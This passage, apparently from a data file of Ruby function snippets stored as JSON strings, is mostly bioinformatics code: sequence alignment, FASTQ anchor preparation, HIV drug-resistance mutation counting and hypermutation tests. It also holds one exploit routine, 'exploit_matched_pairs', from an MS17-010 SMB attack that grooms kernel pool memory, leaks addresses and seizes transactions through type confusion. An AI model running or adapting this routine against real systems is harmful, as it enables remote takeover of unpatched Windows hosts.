nt_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !nt_sequence_definition.nil? and !nt_sequence.nil?\n nt_sequence_hash[nt_sequence_definition[0]] = query.to_seq.seq\n\n header_array << nt_sequence_definition[0].strip\n accession_no_array << nt_sequence_definition[1].strip\n end\n end\n\n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following nucleotide sequences are not following our submission rules\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed nucleotide sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n return possible_errors\n end\n \n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n \n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"nt\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have invalid accession number from NCBI. Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n\n\n # check missing sequence\n missing_aa_sequence, missing_nt_sequence = check_matchness(aa_sequence_hash,nt_sequence_hash)\n # puts \"missing_aa_sequence => #{missing_aa_sequence}\"\n # puts \"missing_nt_sequence => #{missing_nt_sequence}\"\n missing_seq_string = \"\"\n if missing_aa_sequence.length > 0\n missing_seq_string += \"You are missing following amino acid sequence based on your nucleotide sequence:\\n\"\n missing_aa_sequence.each do |aa_seq_name|\n missing_seq_string += \"#{aa_seq_name}\\n\"\n end\n end\n\n if missing_nt_sequence.length > 0\n missing_seq_string += \"You are missing following nucleotide sequence based on your amino acid sequence:\\n\"\n missing_nt_sequence.each do |nt_seq_name|\n missing_seq_string += \"#{nt_seq_name}\\n\"\n end\n end\n\n if missing_seq_string.length > 0\n possible_errors << missing_seq_string\n end\n\n\n\n # if error, return error\n # else, return aa_array and nt_array \n if possible_errors.length > 0\n return possible_errors\n else\n aa_nt_array = Hash.new\n aa_nt_array[\"aa\"] = aa_seq_array\n aa_nt_array[\"nt\"] = nt_seq_array\n return aa_nt_array\n end\n\n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def update_total_matches\n self.correct_matches = (maker.code.select.with_index { |v, i| v == breaker.guess[i] }).length\n self.matches = 4 - (maker.code - breaker.guess).length - correct_matches\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def align!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 32 )\n\n type = ALIGN\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 362:8: 'align'\n match( \"align\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 32 )\n\n end",
"def predation matchTimes\n\t\tmatchTimes.times do |t| \n\t\t\tif @arrayChromosomes.size < 2\n\t\t\t\tbreak\n\t\t\tend\n\t\t\tpos1=rand(@arrayChromosomes.size)\n\t\t\tpos2=rand(@arrayChromosomes.size)\n\t\t\t\n\t\t\twhile pos1 == pos2 do\n\t\t\t\tpos2=rand(@arrayChromosomes.size)\n\t\t\tend\n\t\t\t\n\t\t\tchromosome1=@arrayChromosomes[pos1]\n\t\t\tchromosome2=@arrayChromosomes[pos2]\n\t\t\tchromosome1.fitness=@@predationMatrix[chromosome1.decision][chromosome2.decision][0]\n\t\t\tchromosome2.fitness=@@predationMatrix[chromosome1.decision][chromosome2.decision][1]\n\t\t\t\n\t\t\tif chromosome1.fitness > chromosome2.fitness\n\t\t\t\t@arrayChromosomes.delete_at pos2\n\t\t\telsif chromosome1.fitness < chromosome2.fitness\n\t\t\t\t@arrayChromosomes.delete_at pos1\n\t\t\telsif chromosome1.fitness == @@predationMatrix[1][1][1]\n\t\t\t\tif not @@killTwoSelfish ###MATAR UNO ALEATORIO\n\t\t\t\t\t@arrayChromosomes.delete_at (rand(2)==0)? pos1 : pos2\n\t\t\t\telse ###MATAR LOS DOS\n\t\t\t\t\t@arrayChromosomes.delete_at pos1\n\t\t\t\t\tif pos1 < pos2\n\t\t\t\t\t\tpos2-=1\n\t\t\t\t\tend\n\t\t\t\t\t@arrayChromosomes.delete_at pos2\n\t\t\t\tend\n\t\t\tend\n\t\t\t\n\t\tend\n\tend",
"def query_align(seqs)\n seqtype = nil\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs)\n end\n seqs.each do |s|\n if s.is_a?(Bio::Sequence::AA) then\n seqtype = 'PROTEIN'\n elsif s.is_a?(Bio::Sequence::NA) then\n seqtype = 'DNA'\n end\n break if seqtype\n end\n query_string(seqs.to_fasta(70, :avoid_same_name => true), seqtype)\n end",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def brute_force_optimal(tg,faulty,replacements,n)\n if tg[1].size == 0 # special case if there are no edges(all replacements are equal)\n return get_mappings(faulty,replacements)[0] # return the first mapping\n end\n get_mappings(faulty,replacements).min_by do |a|\n euclidean_distance(tg,a,n) \n end\nend",
"def check_alignment_marker\n alignment_marker = find(:item, sample: { name: \"QX Alignment Marker (15bp/5kb)\" })[0]\n marker_in_analyzer = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s.location == \"Fragment analyzer\" }\n marker_needs_replacing = (!marker_in_analyzer.nil? && marker_in_analyzer.get(:begin_date)) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true\n alignment_marker_stripwell = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s != marker_in_analyzer }\n if marker_needs_replacing && alignment_marker_stripwell\n \n show do\n title \"Place stripwell #{alignment_marker_stripwell} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the \\\"Load Position\\\" icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\" if marker_in_analyzer\n check \"Place the alignment marker stripwell labeled #{alignment_marker_stripwell} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n \n alignment_marker_stripwell.location = \"Fragment analyzer\"\n alignment_marker_stripwell.associate :begin_date, Date.today.strftime\n alignment_marker_stripwell.save\n release [alignment_marker_stripwell]\n marker_in_analyzer.mark_as_deleted\n end\n end",
"def traceback(i, j, tn) \n alignment = [\"\", \"\"]\n \n loop do\n t = @ts[tn][1]\n \n # Are we at the end?\n return [alignment] if i == 0 || j == 0\n # If performing a local alignment, has the score dropped below 0?\n return [alignment] if !@align_globally && @ts[tn][0][i][j] <= 0\n \n # Insert as appropriate.\n if t[i][j][0][0] == i - 1\n alignment[0].insert(0, @a[i - 1])\n else\n alignment[0].insert(0, '_')\n end\n if t[i][j][0][1] == j - 1\n alignment[1].insert(0, @b[j - 1])\n else\n alignment[1].insert(0, '_')\n end\n \n # During local alignment, you must implement the following simplification. \n # If you trace back to a cell that contains pointers to a zero in the M \n # matrix and a pointer to a zero in the Ix or Iy matrix, you should only \n # follow the pointer to the zero in the M matrix and terminate your \n # traceback there only. This will prevent you from having alignments \n # that are right-sided substrings.\n \n # If there are multiple possible traceback paths originating in this cell,\n # recurse and follow them individually.\n if t[i][j].size > 1\n # If we are tracing back to a cell with a 0 in the M matrix, we ignore\n # other possible tracebacks.\n if t[i][j].any? {|c| c[2] == :m && @m[c[0]][c[1]] == 0}\n tracebacks = t[i][j].select {|c| c[2] == :m}\n else\n tracebacks = t[i][j]\n end\n \n subalignments = []\n tracebacks.each do |cell|\n traceback(cell[0], cell[1], cell[2]).each do |subalignment|\n subalignments << subalignment\n end\n end\n return subalignments.map do |subalignment|\n [\n subalignment[0] + alignment[0],\n subalignment[1] + alignment[1]\n ]\n end\n end\n \n i, j, tn = t[i][j][0]\n end\n end",
"def a3g_hypermut_seq_hash(seq_hash)\n #mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n #total G->A mutations at apobec3g/f positions.\n total = 0\n\n #make specimen consensus\n ref = consensus_without_alignment(seq_hash.values)\n\n #obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n seq_hash.each do |k,v|\n a = 0 #muts\n b = 0 #potential mut sites\n c = 0 #control muts\n d = 0 #potenrial controls\n mut.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = k + \",\" + a.to_s + \",\" + b.to_s + \",\" + c.to_s + \",\" + d.to_s + \",\" + rr.round(2).to_s + \",\" + perc.to_s\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if seq_hash.size > 20\n rate = total.to_f/(seq_hash.size)\n\n count_mut = count(mut_hash.values)\n maxi_count = count_mut.values.max\n\n poisson_hash = poisson_distribution(rate,maxi_count)\n\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = seq_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = {}\n hm_hash.keys.each do |k|\n hm_seq_hash[k] = seq_hash[k]\n end\n return [hm_seq_hash,hm_hash]\nend",
"def matches(max_mismatches)\n out = []\n\n (0..text_len-patt_len).each do |i|\n out << i if quasi_match?(i, max_mismatches)\n end\n\n out\n end",
"def exploit_matched_pairs(pipe_handle)\n begin\n leak_frag_size(pipe_handle.file_id)\n rescue TypeError => e\n raise MS17_010_Error, 'TypeError leaking initial Frag size, is the target patched?'\n end\n\n # we have all info for offsets now\n #@ctx = @ctx.merge(OS_ARCH_INFO[@ctx['os']][@ctx['arch']])\n pick_ctx()\n\n # groom: srv buffer header\n @ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])\n\n # groom paramters and data is alignment by 8 because it is NT_TRANS\n @ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)\n\n # bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)\n bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']\n @ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])\n\n if datastore['DBGTRACE']\n print_status(\"GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}\")\n print_status(\"BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}\")\n end\n\n # bride paramters and data is alignment by 4 because it is TRANS\n @ctx['BRIDE_DATA_SIZE'] = @ctx['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - @ctx['TRANS_SIZE']\n\n # ================================\n # try align pagedpool and leak info until satisfy\n # ================================\n for i in 0..datastore['LEAKATTEMPTS']\n reset_extra_multiplex_id()\n\n vprint_status(\"Attempting leak ##{i.to_s}\")\n\n leakInfo = align_transaction_and_leak(pipe_handle)\n\n if leakInfo != nil\n break\n end\n\n vprint_status(\"Align transaction and leak failed, attempt ##{i.to_s}\")\n\n # we don't need to do any cleanup in this case\n if i == datastore['LEAKATTEMPTS'] - 1\n raise MS17_010_Error, \"Abort after using up all LEAKATTEMPTS.\"\n end\n\n # close pipe, disconnect IPC$\n pipe_handle.close()\n self.simple.client.tree_disconnect()\n\n # connect IPC$, open pipe\n self.simple.client.tree_connect(\"\\\\\\\\#{@ctx['ip']}\\\\IPC$\")\n pipe_handle = self.simple.create_pipe(@ctx['pipe_name'], 'o')\n end\n\n @ctx['fid'] = pipe_handle.file_id\n @ctx['pipe_handle'] = pipe_handle\n @ctx = @ctx.merge(leakInfo)\n\n vprint_status(\"Leaked connection struct (0x#{@ctx['connection'].to_s(16)}), performing WriteAndX type confusion\")\n\n # ================================\n # shift transGroom.Indata ptr with SmbWriteAndX\n # ================================\n shift_indata_byte = 0x200\n do_write_andx_raw_pipe(fid:pipe_handle.file_id, data: Rex::Text.rand_text_alpha(shift_indata_byte))#'A'*shift_indata_byte)\n\n # Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.\n # So the below operation is still dangerous. Write only 1 byte with \"\\x00\" might be safe even alignment is wrong.\n # maxParameterCount (0x1000), trans name (4), param (4)\n indata_value = @ctx['next_page_addr'] + @ctx['TRANS_SIZE'] + 8 + @ctx['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte\n indata_next_trans_displacement = @ctx['trans2_addr'] - indata_value\n\n # if the overwritten is correct, a modified transaction mid should be special_mid now.\n # a new transaction with special_mid should be error.\n delta = indata_next_trans_displacement + @ctx['TRANS_MID_OFFSET']\n pkt = create_nt_trans_secondary_packet(mid: pipe_handle.file_id, data: \"\\x00\",\n dataDisplacement: delta)\n\n self.simple.client.smb_send(pkt.to_s)\n\n # wait for completion\n do_smb_echo()\n\n pkt = create_nt_trans_packet(5, mid: @@special_mid, param: [pipe_handle.file_id].pack(\"V\"), data: '')\n recvPkt = smb_send_recv_raw(pkt.to_s)\n\n errno = recvPkt['Payload']['SMB'].v['ErrorClass']\n if errno != 0x10002 # non-specific server error\n raise MS17_010_Error, \"Unexpected return status during overwrite: 0x#{errno.to_s(16)}\"\n end\n\n vprint_status(\"Control of groom transaction\")\n\n fmt = @ctx['PTR_FMT']\n # use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data\n pkt = create_nt_trans_secondary_packet(mid: pipe_handle.file_id, data: [@ctx['trans1_addr']].pack(fmt),\n dataDisplacement: indata_next_trans_displacement + @ctx['TRANS_INDATA_OFFSET'])\n self.simple.client.smb_send(pkt.to_s)\n\n do_smb_echo()\n\n # - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)\n # - trans1.InData to &trans2. so we can modify trans2 with trans1 data\n pkt = create_nt_trans_secondary_packet(mid: @@special_mid,\n data: [@ctx['trans1_addr'], @ctx['trans1_addr']+0x200, @ctx['trans2_addr']].pack(fmt * 3),\n dataDisplacement: @ctx['TRANS_INPARAM_OFFSET'])\n self.simple.client.smb_send(pkt.to_s)\n\n do_smb_echo()\n\n # modify trans2.mid\n @ctx['trans2_mid'] = next_multiplex_id()\n pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'],\n data: [@ctx['trans2_mid']].pack('v'),\n dataDisplacement: @ctx['TRANS_MID_OFFSET'])\n self.simple.client.smb_send(pkt.to_s)\n end",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def alignment= value\n raise unless ALIGNMENTS.any? {|a| a == value }\n @alignment = value\n end",
"def combine_genomes(genome_a, genome_b)\n genome_a = genome_a.split('')\n genome_b = genome_b.split('')\n\n new_genome = \"\"\n 50.times do |i|\n if rand(2) == 1\n new_genome += genome_a[i]\n else\n new_genome += genome_b[i]\n end\n end\n\n mutation(new_genome)\n end",
"def compare_two_seq2(sequence1 = \"\", sequence2 = \"\")\n aln_seq = muscle_sequence2(sequence1,sequence2)\n seq1 = aln_seq[0]\n seq2 = aln_seq[1]\n length = seq1.size\n diff = 0\n (0..(length-1)).each do |position|\n nt1 = seq1[position]\n nt2 = seq2[position]\n diff += 1 unless nt1 == nt2\n end\n return diff\nend",
"def compute_sequence_similarity(ref_sequence, other_sequence)\n total = Repositext::Utils::ArrayDiffer.diff(ref_sequence, other_sequence)\n same = total.find_all { |e| '=' == e.action }\n return 1.0 if same.length == total.length\n return 0.0 if 0 == total.length\n same.length / total.length.to_f\n end",
"def aligned_sequence(start=0,stop = nil,noindent=false) \n self._get_aligned_sequence_from_original_sequence_and_cigar_line\n #seq = AlignSeq.new(self.get_slice.seq,self.cigar_line,start,stop).align\n #return Bio::FastaFormat.new(Bio::Sequence::NA.new(seq).to_fasta(\"#{self.find_organism}\"))\n end",
"def misplacements(true_vals, sample_vals)\n count = 0\n (0...true_vals.size).each do |i|\n count += 1 if true_vals[i][:index] != sample_vals[i][:index]\n end\n count\nend",
"def test_project_from_assembly_to_contigs_with_strand\n # This chromosomal region is covered by 4 contigs and 3 gaps\n # One of the contigs are on the reverse strand.\n assert_equal(7, @target_slices_contigs_with_strand.length)\n assert_equal('contig:Btau_4.0:AAFC03028964:90:9214:1', @target_slices_contigs_with_strand[0].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[1].class)\n assert_equal('contig:Btau_4.0:AAFC03028959:1:1746:-1', @target_slices_contigs_with_strand[2].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[3].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand[4].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[5].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:35:1', @target_slices_contigs_with_strand[6].display_name)\n end",
"def query_align(seqs, *arg)\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs, *arg)\n end\n query_string(seqs.to_fasta(70))\n end",
"def all_files_aligned?\n return false unless files.count > 1 # have to be at least 2 files to be aligned\n # for every fa file there is a corresponding afa file\n # means that chopping off the extensions there will be 2 of every file\n #\n # basename('') chops off both the prefix and the suffix provided so\n # /path/to/foo.fa => foo\n (absolute_path.glob('*.fa').map {|f| f.basename('.fa')} - absolute_path.glob('*.afa').map {|f| f.basename('.afa')}).empty?\n end",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def measure_string_overlap(string_a, string_b)\n overlap = 3\n lcs = 1.0\n min_string_length = [string_a, string_b].map(&:length).min\n prev_sim = 0\n max_sim = 0\n overall_sim = string_a.longest_subsequence_similar(string_b)\n puts \"Overall similarity: #{ overall_sim.round(3) }\"\n similarity_threshold = 0.95\n\n until(\n 1.0 == max_sim ||\n (overlap > 5 && max_sim >= similarity_threshold) ||\n overlap >= min_string_length\n ) do\n puts ''\n string_a_end = string_a[-overlap..-1]\n string_b_start = string_b[0..(overlap-1)]\n sim = string_a_end.longest_subsequence_similar(string_b_start)\n puts [\n ('█' * (sim * 10).round).rjust(10),\n ' ',\n string_a_end.inspect\n ].join\n puts [\n sim.round(3).to_s.rjust(10).color(prev_sim <= sim ? :green : :red),\n ' ',\n string_b_start.inspect\n ].join\n if sim > max_sim\n optimal_overlap = overlap\n end\n max_sim = [max_sim, sim].max\n prev_sim = sim\n overlap += 1\n end\n if max_sim > similarity_threshold\n optimal_overlap\n else\n 0\n end\nend",
